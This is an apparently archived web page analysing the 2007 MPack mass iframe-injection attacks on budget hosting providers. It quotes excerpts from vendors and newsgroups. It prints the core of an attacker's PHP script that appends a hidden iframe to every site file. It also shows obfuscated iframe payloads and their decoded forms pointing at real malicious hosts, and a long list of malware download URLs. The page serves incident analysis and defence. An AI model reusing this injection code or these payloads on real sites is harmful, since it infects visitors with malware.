|
|
Home | Switchboard | Unix Administration | Red Hat | TCP/IP Networks | Neoliberalism | Toxic Managers |
| (slightly skeptical) Educational society promoting "Back to basics" movement against IT overcomplexity and bastardization of classic Unix | |||||||
|
|
In July 2007 there was a new massive hacking attack on web sites. This attack targeted primarily budget Webhosting providers but it was not limited to them. For example several site from HBS were compromised too. SANS has another List Of Compromised Sites
|
|
It looks like the attack usually has two stages.
| This attack stresses the fact that Web browsers should now be installed on VM and used with a special disposable image of Windows. Please consider using Microsoft Virtual PC or VMware and opening a separate instance of OS for browsing if you did not do it already. |
The best description of the first phase that I found is from Hosting Reviews at Hostjury.com - Blog and is related to Dreamhost. In no way you should consider that Dreamhost was alone. They were just more open about it and I would give they high credits. Most other providers affected tried to swipe the dirt under the carpet.
According to an e-mail sent out to many Dreamhost clientele earlier today there have been over 3,500+ hosting accounts exploited at Dreamhost.
The suspected entry point into the accounts was most likely password sniffing however there are many other rumors surrounding the event.
This exploit quickly followed a recent exploit of IPowerWeb that resulted in the defacement of over 35% of the IPowerWeb clientbase. Earlier this year exploits affected Hostgator & many other large providers whose systems were rooted.
A copy of the e-mail sent out by the dreamhost team is below:
From: DreamHost Security Team
Subject: URGENT: FTP Account Security Concerns…
This email is regarding a potential security concern related to your 'XXXX' FTP account.We have detected what appears to be the exploit of a number of accounts belonging to DreamHost customers, and it appears that your account was one of those affected.
We're still working to determine how this occurred, but it appears that a 3rd party found a way to obtain the password information associated with approximately 3,500 separate FTP accounts and has used that information to append data to the index files of customer sites using automated scripts (primarily for search engine optimization purposes).
Our records indicate that only roughly 20% of the accounts accessed - less than 0.15% of the total accounts that we host - actually had any changes made to them. Most accounts were untouched.
We ask that you do the following as soon as possible:
- Immediately change your FTP password, as well as that of any other accounts that may share the same password. We recommend the use of passwords containing 8 or more random letters and numbers. You may change your FTP password from the web panel ("Users" section, "Manage Users" sub-section).
- Review your hosted accounts/sites and ensure that nothing has been uploaded or changed that you did not do yourself. Many of the unauthorized logins did not result in changes at all (the intruder logged in, obtained a directory listing and quickly logged back out) but to be sure you should carefully review the full contents of your account.
Again, only about 20% of the exploited accounts showed any modifications, and of those the only known changes have been to site index documents (ie. 'index.php', 'index.html', etc - though we recommend looking for other changes as well).
It appears that the same intruder also attempted to gain direct access to our internal customer information database, but this was thwarted by protections we have in place to prevent such access. Similarly, we have seen no indication that the intruder accessed other customer account services such as email or MySQL databases.
In the last 24 hours we have made numerous significant behind-the-scenes changes to improve internal security, including the discovery and patching to prevent a handful of possible exploits.
We will, of course, continue to investigate the source of this particular security breach and keep customers apprised of what we find. Once we learn more, we will be sure to post updates as they become available to our status weblog: http://www.dreamhoststatus.com/
Thank you for your patience. If you have any questions or concerns, please let us know.
On the second stage the pool of passwords harvested is used to modify certain files. We will call this stage "mass modification of index files". It looks like this stage was automated and they use a special tool, called MPACK, to install malicious IFrames. Usually only main site index documents were targeted (ie. index.php, index.html, index.shtml, etc.). Malicious IFrames are usually installed at the beginning or at the end of the document. That might be because of different tools of different version/modes of work of MPACK. But there are other cases when all documents were modified by replacing <body> tag [SANS Internet Storm Center] :
After checking were the compromised web sites were hosted, it became clear to us that we were dealing with a mass defacement when a single (or multiple) physical web servers were hosting thousands of web sites.
One of our readers sent us a PHP script he acquired from a compromised web server. The PHP script is pretty simple, and all it does is traverse through the file system and modify all files so that a malicious iframe tag is appended.
Two things were obvious here:
- The hosting web server did not have proper security on the file system level. This is, unfortunately, pretty common for (cheap?) hosting servers and is required when PHP is executed as a module in Apache. In this case, the main Apache process must be able to at least read all the files, but it appeared that it was able to write to them as well (wrong file permissions maybe?).
- The attackers had to find only one vulnerable PHP script on the server (note – the server might have been hosting thousands of different web sites).
Once attackers found a vulnerable PHP script they first detected the directory hierarchy on the web site. In case of the sample PHP script we received, it looked like this:
for ($i = 3; $i < 500; $i++) {
if ($i == 438) continue;
flush_buffer('<b>/home/sites/site' . $i . '/web</b>:<br>');
iframe_account(array('/home/sites/site' . $i . '/web'));
}From the code snippet above, you can see that all sites have their document root directory set as /home/sites/site[number]/web. The loop creates an array which is then passed to another function called iframe_account().
This function takes every director and performs a recursive search for 4 file types:
$file_types = array('php', 'htm', 'html', 'tpl');
It then opens the files and searches for the "</body>" tag which is replaced with the malicious iframe and properly closed:
$iframed_content = str_replace('</body>', '<iframe src=http://[REMOVED].info/counter style=display:none></iframe></body>', $content);
And voila – a mass compromise happened.
Here is how .Symantec Security Response Weblog describes the tool:
You always thought that by staying clear of the dark alleys of the Internet and visiting only "reputable" websites, you would be safe from attacks and dubious content. I am afraid that is not enough. My colleagues Elia Florio and Hon Lau reported recently (here and here) about legitimate sites that had been compromised to include a malicious IFRAME that, without your knowledge, redirects you to a site serving exploits.As Elia mentioned, thousands of sites (mostly Italian, but with several other nationalities included) were compromised. We were puzzled as to how the MPack gang had managed to hack so many sites in a short period of time, and how they could inject the malicious iframe so quickly.
The MPack gang appears to be using an IFRAME Manager tool to automate the task on a large scale. This is basically an FTP updater client, written in PHP language, that runs on a webserver with MySQL as back-end. It takes as input a list of website administrator accounts (possibly obtained in the black market). It then periodically checks the home pages of those sites to inject a chosen IFRAME into their code.
This iframe manager is another example of a very user-friendly tool with a clear intent of being resold to multiple hacking groups. As such, it offers a number of interesting features. It allows for the iframe to be injected at the top or bottom of the page and you can use regular expressions when defining the pages to be compromised, such as index[.php|.htm|.html]|default.asp. To maximize the return-on-investment, the tool can check the Google PageRank for the potential websites before injecting the iframe, allowing you to select any number of sites with a certain PageRank in a certain country. Furthermore, the tool can be left running and will cycle through the list of sites and re-inject the iframe, should the pages have been cleaned by the site administrator.
To assist the miscreants in this competitive hacker-eat-hacker world, the tool also allows for the removal of any competitors' iframes injected in the page. And of course, extensive logs and statistics are provided.
This tool itself however, cannot hack the websites; it relies on a list of compromised credentials to insert the desired iframe into the websites. Therefore a simple clean-up of the page is not sufficient; the site administrator's credentials need to be changed. To protect yourself as a web surfer, make sure your operating system is up to date with latest patches as well as your anti-virus program.
Posted by Amado Hidalgo on June 19, 2007 11:39 AM
The actual exploit is an encoded IFRAME pointing to the web site with malware.
"Right now, we are not sure whether the porn sites are compromised to host the IFRAMES, are created to do so, or are being paid to host the IFRAMES," acknowledged Trend Micro. The attack probably began June 17, the company said.
Other researchers have continued to dig into the Mpack-based attacks and have shared some of their findings. Symantec, for instance, asked how hackers were able to infect so many sites in such a short time, and how they could inject the necessary IFRAMES code -- the malicious code they added to the legitimate sites' HTML that redirected visitors to the Mpack server -- so quickly.
Pages in hacked web sites are modified using IFRAME to connect to one of many "seed sites" which run scripts that either:
<script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%...'));
//-->
</script>That will give some assurance that this exploit was used only on index document of your WEB site. and was not replicated on other pages.
telnet www.mysite.com 80
12:12
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>501 Method
Not Implemented</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
♥ to /index.h
tml not supported.<P>
Invalid method in request \x03<P>
<HR>
<ADDRESS>Apache/1.3.33
Server at myhost.myisp.com Port 80</ADDRESS>
</BODY></HTML>
Connection to host lost.
Here you can see that the version of web server is old. that does not necessary means that it is vulnerable but still is this of some concern (the latest is 1.3.37).
The encoded fragment that you have found can be decoded via many sites. For example you can use HTML & JavaScript Encoder-Decoder In the case of an exploit listed above the actual code is as following:
<iframe src="http://fotballportal.info/out.php?s_id=1"
style="visibility: hidden; display: none">
</iframe>
That means that you need to block 203.121.73.33 to increase the chances of avoiding infecting users in case of reinfection.
ISPs which do not provide users with shell access, might be hurt if such attacks became recurrent as this is in essence an attack on the business model of cheap, reliable hosting when part of reliability is achieved by not providing ssh access to users.
I would propose several steps that can compensate for the lack of shell access:Sophos, meanwhile, analyzed the nearly 4,000 compromised sites it had found delivering the malicious IFRAMES code, and found that the overwhelming majority -- 98 percent to be exact -- were running the Apache Web server. "The servers targeted in this attack have almost exclusively been running some flavor of Apache on Unix," said a Sophos in a blog entry <http://www.sophos.com/security/blog/2007/06/250.html> Friday.
That might be just a side effect of the fact that this attack targeted budget ISPs.
|
|
Switchboard | ||||
| Latest | |||||
| Past week | |||||
| Past month | |||||
 |
 |
 |
109.86.145.204 64.34.172.171 xeoline.com 70.86.235.162 ns5.btis.co.za 77.246.248.221 ns3.h20.ru
|
|
|
85.255.199.38 hosted.by.hostbasket.com 93.187.141.50 93-187-141-50.profisol.ro 205.251.131.33 s10077.iwsservers.com
213.180.89.75 shwl-0002.s.ipeer.se 83.143.81.162 83.143.81.162 shwl-0002.s.ipeer.se 188.165.217.175 ns211908.ovh.net
217.113.61.155 www.yofej.hu 211.233.11.170 211.233.11.170 www.yofej.hu
72.249.108.140 willow.e3linux.com 95.168.174.31 ns2.safronov.biz 77.79.245.90 p25.progreso.pl
24.173.234.213 rrcs-24-173-234-213.sw.biz.rr.com 219.240.36.36: Non-existent domain 219.240.36.36 rrcs-24-173-234-213.sw.biz.rr.com
195.130.205.27 europrojects.org 216.14.125.163 server.yeshuasharvest.org 180.151.249.166
|
|
|
22 June 2007 11:42 GMT
For the past 7 weeks SophosLabs have been tracking an attack targeting sites all over the world. In the attack, legitimate sites have been compromised so that they serve up a malicious JavaScript (Mal/ObfJS-C). In this post, I present a brief summary of the data obtained thus far.
Since May 1st, we have found 3,896 URLs that have been compromised, over 1,627 different domains. The subject matter of the hacked sites covers as wide a range of topics as you can imagine. Clothes boutiques, driving instruction, nude beauty pageants, celebrity gossip, hypnotherapy through to handmade musical instruments. Most worryingly, there are some fairly popular sites within the list, including a fairly large bank (this site was hacked last week). Taking a deeper look at the data, we can gather further information about this campaign.
As you can see from the following graph (note the log scale on the y-axis), the vast bulk of the compromised pages are being served up from sites in the United States, closely followed by Brazil, Canada and the UK.
It should be noted this data is based on the country in which the host web server resides - it does not indicate the locale of the site itself. For example, several '.co.uk' domains were found to be hosted within the US.
To get a true impression of the scale of such an attack, looking at domain names alone is insufficient. We have encountered previous cases where initial data based on a plethora of compromised domains has suggested a large campaign, only to find that they all were as the result of the hacking of a handful of boxes within a single service provider (Troj/EncIfr-A for example). Looking at this data from an IP perspective reveals 324 unique IP addresses, the bulk of which are hosting a low number of compromised sites.
As might be expected, we can see that in several cases, once the hackers have managed to hack a server, they have compromised several sites hosted there.
Probing further, we can try to identify the operating system and web server application. As you can see below, the servers targeted in this attack have almost exclusively been running some flavour of Apache on Unix.
Though we cannot deduce the method employed by the hackers to compromise the servers, such data is nonetheless interesting. Gathering and analysis of such data provides us with valuable information to assist in the fight against web attacks. As ever, it is imperative that web servers are maintained and patched to the latest level. If you outsource the responsibility of this to your ISP, ensure they follow good practice. Remember, their failure could lead to your loss of credibility if it is your site that gets hacked into a malicious drive-by.
Fraser, SophosLabs UK
|
|
|
<pre>
Could someone help me out and tell me what this is:
<html>
<body>
<script>
document.write(unescape("%3c..."));
</script>
</body>
</html>
</pre>
|
|
|
Nir wrote:
> Andrés M. wrote:
>> Hello, This morning I opened Thunderbird and went to the m.s.firefox
>> newsgroup. I clicked first on the mail with subject "Could this
>> exploit code from a malware site affect Firefox?" and while the mail
>> window was blank and still loading I immediately clicked on the mail
>> with subject "Really really really annoying and persistent display
>> problem...". Almost instantly the latter mail was on screen. Then
>> clicked on the Back button to see the first mail and what I got was a
>> mix of the first half of the first mail with the full content of the
>> second mail (including header) appended below. The resulting content
>> is pasted at the end of this mail. The header of the second mail may
>> be a little different, I copied it manually from an exported text
>> file of the second mail. Look for the word "unescaping" to reach the
>> point where both mails got mixed.
>> I am unable to reproduce this strange event again, but it definitely
>> happened so I wonder if someone can take a look at it.
> either an extensions is causing this -
> "https://bugzilla.mozilla.org/show_bug.cgi?id=370473#c0"
> or it's the theme, you are using , which is misbehaving -
> "https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c36"
> "https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c23"
Oops, sorry I forgot to mention but I'm using Thunderbird 2.0.0.4
completely clean, no extra themes and no add-ons except "Talkback" which
comes with the installer.Thanks for your reply, but add-ons are certainly not the cause.
|
|
|
span class="fontsize0 " id="prof" style="DISPLAY: none">View profile "OMA" <[email protected]> wrote in news:[email protected]: > I'd like to know if that code could exploit any vulnerability > in Firefox, and thus if it may have affected my system. .No. In IE, clicking on the executable would run it. In FF, you can only download an executable file, then you have to browse to the saved file and click it yourself, manually. -- Mozilla & Netscape FAQs: http://www.ufaq.org/ Mozilla/Firefox/Thunderbird/Seamonkey solutions: http://ilias.ca/ Web page validation: http://validator.w3.org
About Mozilla: http://www.mozilla.org Ambition is a poor excuse for not having the good sense to be lazy.
More options Jun 24, 11:00 pm Newsgroups: mozilla.support.firefoxFrom: Chris Jahn <clj...@netscape.net.invalid>
Date: Sun, 24 Jun 2007 22:00:23 -0500
Local: Sun, Jun 24 2007 11:00 pmSubject: Re: Could this exploit code from a malware site affect Firefox?
"OMA" <omol...@inicia.es> wrote in
news:[email protected]:
> I'd like to know if that code could exploit any vulnerability
> in Firefox, and thus if it may have affected my system.No. In IE, clicking on the executable would run it. In FF, you
can only download an executable file, then you have to browse to
the saved file and click it yourself, manually.--
Mozilla & Netscape FAQs: http://www.ufaq.org/
Mozilla/Firefox/Thunderbird/Seamonkey solutions: http://ilias.ca/
Web page validation: http://validator.w3.org
About Mozilla: http://www.mozilla.orgAmbition is a poor excuse for not having the good sense to be
Reply to author Forward Aggro More options Jun 25, 10:48 am Newsgroups: mozilla.support.firefox
lazy.From: Aggro <spammerdr...@yahoo.com>
Date: Mon, 25 Jun 2007 17:48:44 +0300Local: Mon, Jun 25 2007 10:48 am
Subject: Re: Could this exploit code from a malware site affect Firefox?Reply | Reply to author | Forward | Print | Individual message | Show original | Report this message | Find messages by this author
OMA wrote:
There seems to be a large loop. That probably caused your browser to
> Hello, I've accidentally entered a malware site by following an e-mail link
> to www.duhymn.hk (be careful NOT to enter that site with a browser).
> When I entered the site with Firefox 2.0.0.4, the browser immediately
> froze.
froze. Frozing is not an indication that they managed to do something to
your computer.It looks like "Internet Explorer createControlRange Object Buffer Overflow":
http://www.juniper.net/security/auto/vulnerabilities/vuln1850.htmlSo probably only IE users are in danger. I didn't read the whole code,
so I don't know if there is something else also. But I very much doubt
that you would be in danger as you were using 2.0.0.4.--
Solutions for issues with Firefox:
http://kb.mozillazine.org/Category:Issues_%28Firefox%29
|
|
|
WOW this is ALL from omega-it.ru, Wow I feel sorry for that computer network.
We got warezov and zhelatin and nuwar, ircbot, magnoia, and lineage, spys and bankers and a few sdbots. wow jsut from one computer network
http://www.lovemoney88.com/mm/1.exe
http://www.lovemoney88.com/mm/2.exe
http://www.lovemoney88.com/mm/3.exe
http://www.lovemoney88.com/mm/4.exe
http://www.lovemoney88.com/mm/5.exe
http://www.lovemoney88.com/mm/6.exe
http://www.lovemoney88.com/mm/7.exe
http://www.lovemoney88.com/mm/8.exe
http://www.lovemoney88.com/mm/9.exe
http://www.lovemoney88.com/mm/10.exe
http://www.lovemoney88.com/top/top.exe
http://soft.trustincash.com/loader/exe/ticads.exe
http://soft.trustincash.com/loader/exe/tse.exe
http://soft.trustincash.com/loader/exe/b2.exe
http://soft.trustincash.com/loader/exe/u.exe
http://81.29.241.195/part/joke.exe
http://megafastsuperhost.net/loader.exe
http://tyt-menia.net/s32.exe
http://ddl-help.info/readme.exe
http://execucom.co.uk/img/load.exe
http://www.laydy.net/file.exe
http://laydy.net/1/1.exe
http://laydy.net/2/2.exe
http://www.norton-nod32.com/trf/sp_6/file1.exe
http://www.norton-av2007.com/trf/tools/calc.exe
http://www.smalltool.net/new.exe
http://serv263.info/rss/demo.exe
http://a-commando.info/zupastik.exe
http://bahep.info/file.exe
http://coco32.org/o/exp/r/install1.exe
http://208.64.26.150/spm/loader.exe
http://208.64.26.150/spm/2loader.exe
http://208.64.26.150/test1.exe
http://208.64.26.150/spm/4loader.exe
http://205.209.179.15/aff/dir/cent.exe
http://205.209.179.15/aff/dir/pdp.exe
http://70.47.53.19/~soft/bin/iexplore.exe
http://81.95.146.206/windar.exe
http://72.29.67.138/vx0125b.exe
http://70.47.53.19/~soft/bin/ieschedule.exe
http://spywaresoftstop.com/download/sss_setup.exe
http://serv263.info/st.exe
http://laydy.net/3/3.exe
http://laydy.net/4/4.exe
http://laydy.net/5/5.exe
http://81.95.149.235/asm/file.exe
http://coco32.org/tn/axt.exe
http://www.coco32.org/clients/lx001.exe
http://www.coco32.org/clients/137-15.exe
http://s1.rollsystems.info/files/bild.exe
http://coco32.org/tn/axt.exe
http://allddos.biz/sp//b.exe
http://allddos.biz/sp//p.exe
http://hostbiz.info/fgh.exe
http://huyamilka.com/adv/190/win32.exe
http://58.65.232.10/mrkg/l1.exe
http://58.65.232.10/mrkg/l2.exe
http://www.moneyboomtown.com/images/realfoto.exe
http://qazxcdew.by.ru/file.exe
http://miramax-invest.net/ivan/load.exe
http://wert-co.ru/1.exe
http://fotballportal.info/kill/1.exe
http://thekurt.info/load.exe
http://stat1count.net/adv/014/win32.exe
http://bfstats.info/img/avatars/s/123.exe
http://cards.funnystories.ru/adv007.exe
http://cards.funnystories.ru/bot.exe
http://cards.funnystories.ru/img/adv7.exe
http://sun-ww.net/bG9hZGVy/c25hdGNo.exe
http://wow02.w125.west263.cn/mtv/ook.exe
http://baserionkerjans.com/dlksr32.exe
http://baserionkerjans.com/m.2.16.exe
http://baserionkerjans.com/sysmwbt.exe
http://baserionkerjans.com/asr.exe
http://baserionkerjans.com/crslc.exe
http://baserionkerjans.com/KB070517sk.exe
http://baserionkerjans.com/fdd32.exe
http://slil.ru/24353191/919567585/Instal.exe
http://xuyhadesunkadwi.com/fdd32.exe
http://xuyhadesunkadwi.com/asr.exe
http://xuyhadesunkadwi.com/KB070517sk.exe
http://xuyhadesunkadwi.com/c.8.0.exe
http://xuyhadesunkadwi.com/m.2.16.exe
http://xuyhadesunkadwi.com/crslc.exe
http://xuyhadesunkadwi.com/sysmwbt.exe
http://xuyhadesunkadwi.com/dlksr32.exe
http://yuvideo.org/UD2.exe
http://counter-forever.cn/sp_pack/counter/Dropper.exe
http://81.95.148.188/20509.exe
http://zjabutkcjdctv.biz/d1.exe
http://zjabutkcjdctv.biz/d2.exe
http://zjabutkcjdctv.biz/d3.exe
http://www.skytrip.org/p/p.exe
http://216.255.180.6/2497.exe
http://hack-off.info/sb/sferhtemp.exe
http://81.95.149.235/cmddd/216.exe
http://81.95.149.235/cmddd/mail.exe
http://75.126.226.224/aff/dir/alt.exe
http://75.126.226.224/aff/dir/pee.exe
http://inspekt.biz/update.exe
http://inspekt.biz/svchostes.exe
http://ak.ipv1.info/s3.0.exe
http://falop5fas.com/0.exe
http://boln7be8.com/0.exe
http://nower5re9.com/0.exe
http://a-commando.info/ll.exe
http://75.126.21.162/aff/dir/sams.exe
http://zjabutkcjdctv.biz/d4.exe
http://agressor.info/hello.exe
http://hertunjinkdesinl.com/rs34sk.exe
http://hertunjinkdesinl.com/gdf32.exe
http://baserionkerjans.com/gdf32.exe
http://baserionkerjans.com/rs34sk.exe
http://baserionkerjans.com/mdt.exe
http://hertunjinkdesinl.com/dlksr32.exe
http://hertunjinkdesinl.com/m.2.16.exe
http://hertunjinkdesinl.com/sysmwbt.exe
http://hertunjinkdesinl.com/asr.exe
http://hertunjinkdesinl.com/mdt.exe
http://hertunjinkdesinl.com/crslc.exe
http://hertunjinkdesinl.com/KB070517sk.exe
http://hertunjinkdesinl.com/fdd32.exe
http://hertunjinkdesinl.com/c.8.0.exe
http://xuyhadesunkadwi.com/gdf32.exe
http://xuyhadesunkadwi.com/rs34sk.exe
http://xuyhadesunkadwi.com/mdt.exe
http://81.95.149.235/cmddd/215.exe
http://www.ctv163.com/admin/qq.exe
http://baserionkerjans.com/csrcss.exe
http://hertunjinkdesinl.com/csrcss.exe
http://xuyhadesunkadwi.com/csrcss.exe
http://falop5fas.com/1.exe
http://boln7be8.com/1.exe
http://nower5re9.com/1.exe
http://opaga.com/d/f/system.exe
http://www.tbporno.com/soft/tbporno_2.58.exe
http://xuyhadesunkadwi.com/svchcc32.exe
http://baserionkerjans.com/svchcc32.exe
http://hertunjinkdesinl.com/svchcc32.exe
http://81.176.20.4/1.exe
http://216.255.189.214/aff/dir/sony.exe
http://66.148.74.35/aff/dir/sony.exe
http://66.148.74.7/aff/dir/sony.exe
http://66.148.74.35/aff/dir/pdp.exe
http://85.249.23.43/1.exe
http://teryunkasewion.com/skl32.exe
http://2005-search.com/go.exe
http://www.ctv163.com/heixia/q.exe
http://72.20.4.126/dload.exe
http://72.20.4.126/5.exe
http://a-commando.info/zzz.exe
http://www.lightsgb.net/inst.exe
http://www.newoldway.info/winhp32cln.exe
http://81.95.149.235/loads/load2.exe
|
|
|
Ethan Zuckerman has a fascinating story about how contemporary malware works.It begins with him Googling a friend to find the URL of her home page, only to find that Google wouldn't connect him to her site and flashed up the warning "This site may harm your computer". It transpired that this is the result of the StopBadware campaign run by the folks at the Berkman Center; Google identifies sites that it believes are spreading malware and registers them with Stop Badware. If a site has been blacklisted, its owner has the option of proptesting and having his/her case reviewed by the Berkman people. Ethan duly protested on his friend's behalf…
Within half an hour, three of my colleages pointed me to the source code of my friend's page. At the top of her index page was a strange-looking piece of Javascript:
script language="javascript"> document.write( unescape(
'%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E'
) );That's some seriously obfuscated Javascript. But if you translate from hexidecimal to ASCII, the code's pretty clear - it inserts the following code into the top of the HTML page:
< iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter>< /iframe>
The code opens an "iframe", an inline frame which allows another web page to be embedded within a page - iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.
That page doesn't load on my browser - the server is apparently refusing connections, at least from my Macintosh - but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you'll mostly find lots of angry message board posts from spamfighters - the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness- associated webpages are in Russian, though their servers are currently in Panama City, Panama - some antispammers believe that RBusiness is short for "Russian Business Network", which was evidently their previous operating name.
Googling for the specific IP - 81.95.146.98 - turns up a couple of pages with people documenting an interesting exploit - the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user's system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company's travel policy. (Remarkably, this site is the #1 match for a search for "travel policy" on Google, though Google doesn't let you click directly to the page, stopping you with a "harm your computer" message.)
It's possible that this is what my friend's site was trying to install - Ivan's report dates from October 2006. It's also possible that it was trying to install a more recent package of malware - Trojan-PSW.Win32.Small.bs - which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.
So had Ethan's friend got into bed with these Russian hoodlums? Unlikely.
Simply put, [her site] was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they're able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend's server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.
Which is deeply ironic, given what the StopBadware initiative was set up to do. But in a way, it only goes to underscore how complex and dangerous our software monoculture has become.
|
|
|
Banner ads appearing on popular European web sites have been directing traffic to sites that install malware on visitors' computers, according to the Internet Storm Center. The attacks are exploiting an unpatched flaw in the way Internet Explorer 6 handles the IFRAME tag."Some high profile sites with banner ads are linking to servers that have the exploit and malicious code," according to an advisory on the ISC web site. The attack is an expanded version of banner-based exploits that first surfaced earlier this year. Banner networks, with their ability to place code on hundreds of outside sites, offer a vehicle for the rapid distribution of trojans and other malware, as well as a way to deface web pages. It is not clear whether the malicious code was being spread through a compromised ad server, or through specific banners submitted to ad networks.
Site operators are being cautioned to verify that the banners do not contain the IFRAME exploit code, or failing that, temporarily disable banner ads to minimize the risk of accidentally infecting users and propagating the exploit. The ISC did not identify any of the affected sites.
Users clicking on the banners are being infected with variants of the Bofra worm that has been proporagating through e-mail and malicious web sites. Bofra appeared just days after the revelation of the IFRAME vulnerability, which affects Internet Explorer 6 on all Windows platforms except Windows XP Service Pack 2 (SP2). This vulnerability allows attackers to gain complete control of a user's computer.
|
|
|
on-line linkscanner:
http://linkscanner.explabs.com/linkscanner/default.aspBut the best you could do:
For home users:
* Beware of pages that require software installation. Do not allow new software installation from your browser unless you absolutely trust both the Web page and the provider of the software.
* Scan with an updated antivirus and anti-spyware software any program downloaded through the Internet. This includes any downloads from P2P networks, through the Web and any FTP server regardless of the source.
* Beware of unexpected strange-looking emails, regardless of their sender. Never open attachments or click on links contained in these email messages.
* Enable the "Automatic Update" feature in your Windows operating system and apply new updates as soon as they are available.
* Always have an antivirus real-time scan service. Monitor regularly that it is being updated and that the service is running.
* Free security tools are available at www.trendmicro.com
http://us.trendmicro.com/us/about/news/pr/article/20070618185040.html
|
|
|
Several hundred pornography sites are surprising unwitting users with a smorgasbord of exploits via Mpack, the already notorious hacker toolkit that launched massive attacks earlier this week from a network of more than 10,000 compromised domains.
Trend Micro has spotted nearly 200 porn domains -- most dealing in incestuous content -- that have either been hacked or are purposefully redirecting users to servers hosting Mpack, a professional, Russian-made collection of exploits that comes complete with a management console.
Even though there are far fewer porn sites in this newly discovered infection chain than in Monday's "Italian Job" attack -- called that because most of the 10,000+ hijacked sites were legitimate Italian domains -- they've managed to infect twice as many end-users' PCs, said Trend Micro in a posting to its malware blog.
"Right now, we are not sure whether the porn sites are compromised to host the IFRAMES, are created to do so, or are being paid to host the IFRAMES," acknowledged Trend Micro. The attack probably began June 17, the company said.
Other researchers have continued to dig into the Mpack-based attacks and have shared some of their findings. Symantec, for instance, asked how hackers were able to infect so many sites in such a short time, and how they could inject the necessary IFRAMES code -- the malicious code they added to the legitimate sites' HTML that redirected visitors to the Mpack server -- so quickly.
"The MPack gang appears to be using an IFRAME manager tool to automate the task on a large scale," said Amado Hidalgo, a Symantec security analyst. The tool, which Hidalgo said was basically an FTP updater using MySQL as a back-end database, regularly checks a large list of sites to inject the malicious IFRAME code.
Hidalgo also spelled out how hackers have been getting into legitimate sites, which puzzled investigators earlier this week. "It takes as input a list of Web site administrator accounts, possibly obtained in the black market," he said. Those administrator accounts are recorded in MySQL, and the manager can be left running so that it re-infects sites that have been purged of the IFRAMES code. "A simple clean-up of the page is not sufficient," advised Hidalgo. "The site administrator's credentials need to be changed."
Sophos, meanwhile, analyzed the nearly 4,000 compromised sites it had found delivering the malicious IFRAMES code, and found that the overwhelming majority -- 98 percent to be exact -- were running the Apache Web server. "The servers targeted in this attack have almost exclusively been running some flavor of Apache on Unix," said a Sophos in a blog entry Friday. That's not always the case, said Ron O'Brien, senior security analyst at Sophos. "Overall, hacked sites are about evenly split between Apache and [Microsoft] IIS servers, but in this subset it's almost entirely Apache." Another interesting factoid, said O'Brien: "Of all the sites we've tracked that serve malicious code, about 80 percent have been hacked."
Still other researchers rooted out details of Mpack, including its price and the nom-de-plume of its creator. Ken Dunham, director of VeriSign-iDefense's rapid response team, said Mpack sells for around US$1,000, and that the man [or woman] behind it goes by "$ash" in the Russian hacker underground. The latest version of Mpack, .90, includes exploits for eight different vulnerabilities, six of them flaws in Windows or Internet Explorer, including the dangerous ANI bug that affected Vista earlier this year.
"This is a powerful Web exploitation tool," Dunham said.
Google matched content |
Society
Groupthink : Two Party System as Polyarchy : Corruption of Regulators : Bureaucracies : Understanding Micromanagers and Control Freaks : Toxic Managers : Harvard Mafia : Diplomatic Communication : Surviving a Bad Performance Review : Insufficient Retirement Funds as Immanent Problem of Neoliberal Regime : PseudoScience : Who Rules America : Neoliberalism : The Iron Law of Oligarchy : Libertarian Philosophy
Quotes
War and Peace : Skeptical Finance : John Kenneth Galbraith :Talleyrand : Oscar Wilde : Otto Von Bismarck : Keynes : George Carlin : Skeptics : Propaganda : SE quotes : Language Design and Programming Quotes : Random IT-related quotes : Somerset Maugham : Marcus Aurelius : Kurt Vonnegut : Eric Hoffer : Winston Churchill : Napoleon Bonaparte : Ambrose Bierce : Bernard Shaw : Mark Twain Quotes
Bulletin:
